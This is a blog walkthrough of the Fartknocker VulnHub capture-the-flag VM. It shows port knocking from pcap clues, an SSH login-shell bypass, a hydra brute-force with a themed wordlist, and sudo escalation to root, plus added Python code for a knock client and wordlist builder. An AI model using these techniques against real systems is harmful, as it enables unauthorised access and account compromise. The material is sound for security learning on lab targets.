Thursday, 16 April 2015

TopHatSec - Fartknocker VM - Hosted on Vulnhub


arp gives:


Address                  HWtype  HWaddress           Flags Mask            Iface
                         ether   08:00:27:91:bc:58   C                     vboxnet0



# Nmap 6.47 scan initiated Sat Apr 11 10:48:06 2015 as: nmap -sS -A -p- -oA fartknocker
Nmap scan report for
Host is up (0.0012s latency).
Not shown: 65534 closed ports
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:91:BC:58 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 1 hop

1   1.18 ms

OS and Service detection performed. Please report any incorrect results at .
# Nmap done at Sat Apr 11 10:48:23 2015 -- 1 IP address (1 host up) scanned in 17.77 seconds

The full-range SYN scan shows a single open TCP port: a webserver, Apache 2.4.7 on Ubuntu, on port 80. No SSH or any other remote-administration service is exposed, which turns out to matter later.



- Nikto v2.1.5/2.1.5
+ Target Host:
+ Target Port: 80
+ GET /: Server leaks inodes via ETags, header found with file /, fields: 0x68 0x5105a792cb1f8
+ GET /: The anti-clickjacking X-Frame-Options header is not present.
+ -3233: GET /icons/README: /icons/README: Apache default file found


Not much from that.

So I visited the page in a browser.

The link "Wooah" downloads pcap1.pcap.

Opening it in Wireshark shows a lot of ICMP flying back and forth, but lower down something more interesting is happening.

TCP ports 7000, 8000, 9000 and 8888 are hit, in that order.

This looked like port knocking. A Linux box that exposes only a webserver and no SSH or other remote administration suggests the real services are hidden behind knockd, which watches the wire (via libpcap) for a specific sequence of packets and opens a firewall hole once it has seen them.

My Python is basic, to say the least, so I knocked up a simple bash script using netcat:

nc -v 7000
nc -v 8000
nc -v 9000
nc -v 8888

After a few frustrating attempts it finally worked. Two things matter for a script like this: the ports have to be hit in the configured order within knockd's sequence timeout, and the refused connections on the first three ports are expected, since knockd only needs to see the SYN arrive. Only the final port should actually accept.


nc: connect to port 7000 (tcp) failed: Connection refused
nc: connect to port 8000 (tcp) failed: Connection refused
nc: connect to port 9000 (tcp) failed: Connection refused
Connection to 8888 port [tcp/*] succeeded!


Visiting the site in a browser again gives a different page with another link.

The link gives another pcap file, pcap2.pcap.

Wireshark shows some more ICMP and ARP traffic, but further down more connections are established, this time to different ports and not all of them TCP.

Connections to TCP 21, UDP 22, TCP 80 and TCP 8080; then a connection to http-alt (port 8080) is established and data goes back and forth. The mix of TCP and UDP is the tell: a knockd sequence can include UDP ports, and a TCP-only netcat loop will miss those steps.

I first probed with another bash script against ports 1, 3, 3, 7, to no avail.
I decided to go slightly more upmarket and use knock-knock.
After a bit of tweaking, the script kicked in.

[-] Scanning with Nmap, this could take a minute...go get some coffee

[-] Sending default knockd sequence to

[-] Scanning again...too soon for more coffee???

[+] 1 new port(s) opened...
(1337, 'tcp')

Writing to output file - outfile.txt

It showed port 1337 was now open.

nc -vv 1337
Connection to 1337 port [tcp/*] succeeded!

No pcap file this time, but the clue "all about that base" pointed at base64:

 echo "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" > base64_encoded.txt

base64 -d base64_encoded.txt
Open up SSH: 8888 9999 7777 6666

Another knocking sequence, so I returned to my bash script method.

nc -v 8888
nc -v 9999
nc -v 7777
nc -v 6666
nc -v 22

nc: connect to port 8888 (tcp) failed: Connection refused
nc: connect to port 9999 (tcp) failed: Connection refused
nc: connect to port 7777 (tcp) failed: Connection refused
nc: connect to port 6666 (tcp) failed: Connection refused
Connection to 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2

Port 22 is now open, nice one!
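The knocks above (7000 8000 9000 to open 8888, and 8888 9999 7777 6666 to open SSH) and the mixed TCP/UDP sequence seen in pcap2 can all be replayed with one small client. The following is an added example, not code from the original write-up or from knockd: it does in Python sockets what the netcat script does, adds UDP steps, and then tests whether the target port actually opened. The host, the knock ports and the throwaway local listener it uses to demonstrate itself are constructed for the example; against the real box the host is the VM's address on vboxnet0.

```python
"""Port-knock client: replay a knock sequence, then check whether the target port
opened.  Added example for this write-up, not code from the original post or from
knockd.  Host, ports and the local stand-in listener are constructed for the demo."""
import socket
import threading
import time


def parse_sequence(text):
    """Turn "7000 8000 9000" or "21:tcp 22:udp 80:tcp" into [(port, proto), ...].
    A step with no protocol is TCP, which is what the netcat script assumed."""
    seq = []
    for tok in text.split():
        port, _, proto = tok.partition(":")
        seq.append((int(port), (proto or "tcp").lower()))
    return seq


def knock(host, sequence, delay=0.2, timeout=1.0):
    """Send one packet per step, in order, and return [(port, proto, outcome), ...].

    knockd watches the wire with libpcap, so a TCP step only has to get the SYN
    to the host: "refused" (SYN sent, RST back) is the normal, successful case
    for a closed knock port.  UDP steps just need a datagram to leave."""
    log = []
    for port, proto in sequence:
        if proto == "tcp":
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(timeout)
            try:
                s.connect((host, port))
                outcome = "connected"
            except ConnectionRefusedError:
                outcome = "refused"
            except socket.timeout:
                outcome = "filtered"    # no RST: the SYN may have been dropped upstream
            except OSError as exc:
                outcome = "error:%s" % exc.errno
            finally:
                s.close()
        elif proto == "udp":
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            try:
                s.sendto(b"knock", (host, port))
                outcome = "sent"
            finally:
                s.close()
        else:
            raise ValueError("unknown protocol %r" % proto)
        log.append((port, proto, outcome))
        time.sleep(delay)   # order matters to knockd, not speed; keep the steps distinct
    return log


def port_open(host, port, timeout=1.0):
    """True if a TCP connect to host:port completes (the service the knock opens)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except OSError:
            return False


def knock_and_check(host, sequence_text, target_port):
    """Replay the sequence, then test the port it is supposed to open."""
    log = knock(host, parse_sequence(sequence_text))
    return log, port_open(host, target_port)


def start_local_listener():
    """Constructed stand-in for the service a successful knock opens: a throwaway
    TCP listener on 127.0.0.1 (free port, daemon thread).  Returns the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    # Demo against localhost: the knock ports are (almost certainly) closed and
    # come back "refused"; the stand-in listener plays the role of the opened port.
    opened_port = start_local_listener()
    log, opened = knock_and_check("127.0.0.1", "7000 8000 9000 22:udp", opened_port)
    for port, proto, outcome in log:
        print("knock %5d/%s -> %s" % (port, proto, outcome))
    print("port %d open after knock: %s" % (opened_port, opened))
```

Against the VM, call it with the target address instead of 127.0.0.1, for example knock_and_check("192.0.2.10", "8888 9999 7777 6666", 22) (192.0.2.10 is a placeholder address). A "filtered" outcome is worth a second look: knockd on the target still sees a SYN that the box's own iptables later drops, but a SYN dropped by something in between never reaches it, and the sequence silently fails.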

# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #

However, this was not to be as smooth as I initially thought.

butthead@'s password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)

 * Documentation:
Last login: Sun Apr 12 15:01:54 2015 from
You are only logging in for a split second! What do you do!
Connection to closed.


A little digging in the ssh man page turned up the answer: ssh takes an optional command as its last argument, and when one is given it runs that on the remote host instead of starting the user's interactive login shell, so whatever is cutting the session short at login never gets a chance to run.


     ssh — OpenSSH SSH client (remote login program)

     ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
         [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file]
         [-L [bind_address:]port:host:hostport] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option]
         [-p port] [-Q cipher | cipher-auth | mac | kex | key] [-R [bind_address:]port:host:hostport]
         [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command]

ssh -l butthead /bin/bash
butthead@'s password:

There is no prompt, since bash started this way is not interactive and just reads commands from stdin, but after a few seconds of waiting I typed id and got output:

uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)
cat nachos
Great job on getting this far.

Can you login as beavis or root ?

This was another hint.

grep beavis /etc/passwd

I spent a while looking through the home folder of "beavis" without finding much, so I decided to set hydra loose on the SSH service.

After no luck with conventional wordlists, I used CeWL to generate my own from the Wikipedia page on Beavis and Butthead.
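CeWL crawls a site and emits the words it finds (for instance cewl -d 2 -m 5 -w words.txt URL), and that list is what hydra was fed. As an added example, and not the write-up's own tooling or CeWL's code, here is the same idea in Python over a constructed HTML snippet, with one extra step that the password found on this box motivates: lowercase joins of adjacent words, so that "Mike Judge" in the text yields the candidate mikejudge. SAMPLE_HTML is made up for the example and is not the Wikipedia page; the function and parameter names are the example's own.

```python
"""Targeted wordlist builder, added example (not the write-up's tooling and not
CeWL): visible-text extraction, word filtering, case variants and adjacent-word
joins.  SAMPLE_HTML is constructed for the example, not a real page."""
import re
from html.parser import HTMLParser

SAMPLE_HTML = """<html><body>
<h1>Beavis and Butt-head</h1>
<p>Beavis and Butt-head is an American animated series created by
<a href="/wiki/Mike_Judge">Mike Judge</a>. The show's characters attend
Highland High School and eat nachos.</p>
<script>var x = "ignored";</script>
</body></html>"""


class _VisibleText(HTMLParser):
    """Collect text nodes, skipping the bodies of script and style elements."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


def visible_text(html):
    parser = _VisibleText()
    parser.feed(html)
    return " ".join(parser.parts)


def words(text, min_len=3):
    """Alphabetic tokens of at least min_len characters, in document order."""
    return [w for w in re.findall(r"[A-Za-z]+", text) if len(w) >= min_len]


def candidates(text, min_len=3, joins=True):
    """Ordered, de-duplicated candidates: each word lowercased and capitalised,
    plus (optionally) the lowercase join of every adjacent pair, which is how a
    two-word name such as "Mike Judge" becomes the single guess "mikejudge"."""
    ws = words(text, min_len)
    out, seen = [], set()

    def add(c):
        if c not in seen:
            seen.add(c)
            out.append(c)

    for w in ws:
        add(w.lower())
        add(w.capitalize())
    if joins:
        for a, b in zip(ws, ws[1:]):
            add((a + b).lower())
    return out


def build_wordlist(html, min_len=3, joins=True):
    return candidates(visible_text(html), min_len, joins)


if __name__ == "__main__":
    for candidate in build_wordlist(SAMPLE_HTML):
        print(candidate)
```

Write the output to a file and hand it to hydra with -l beavis -P wordlist.txt -t 4 ssh://<target>. Keeping the list small and themed is the point: a few hundred targeted guesses at -t 4 finish in minutes, where a generic list would still be running.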

[DATA] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[22][ssh] host:   login: beavis   password: mikejudge
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2015-04-12 22:08:18

Hydra had found a valid password for the user "beavis". The "ssh protocol error" lines are a known side effect of running too many parallel SSH tasks against one sshd; hydra's own documentation recommends -t 4 for ssh, which avoids them.

Logging in....

beavis@'s password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)

 * Documentation:
Last login: Sun Apr 12 17:07:32 2015 from

This was starting to go very well. Time to look for ways to obtain root.

beavis@Huhuhhhhhuhuhhh:~$ id
uid=1000(beavis) gid=1000(beavis) groups=1000(beavis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
beavis@Huhuhhhhhuhuhhh:~$ sudo -l
[sudo] password for beavis: 

Matching Defaults entries for beavis on Huhuhhhhhuhuhhh:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User beavis may run the following commands on Huhuhhhhhuhuhhh:
    (ALL : ALL) ALL

id shows beavis is in group 27 (sudo), and sudo -l confirms the account may run any command as any user: (ALL : ALL) ALL. That is a full privilege escalation with no further work, because sudo asks for the invoking user's own password by default and that password (mikejudge) is already in hand.

beavis@Huhuhhhhhuhuhhh:~$ sudo bash
root@Huhuhhhhhuhuhhh:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Huhuhhhhhuhuhhh:~# cd /root
root@Huhuhhhhhuhuhhh:/root# ls
root@Huhuhhhhhuhuhhh:/root# more SECRETZ
You have done a great job, if you can see this, please shoot me an email
and let me know that you have beat this box!




Thanks to everyone at Vulnhub for the guidance over the time I've been there.

Special Thanks To Tophatsec for creating this challenge.


  1. So disappointed. Not even a clue how you did it. All your phases are just guessing types. Learn "how" to explain.

  2. I agree, however I think I was trying to keep to basic bullet points and not get wrapped up in technicalities when I wrote this a few years back.

    I remind you I am not a hired pentester, and a mere hobbyist.

    If you came into this expecting some kind of report, then you are mistaken.

  3. Thank you for your feedback, I will utilise this in my next one.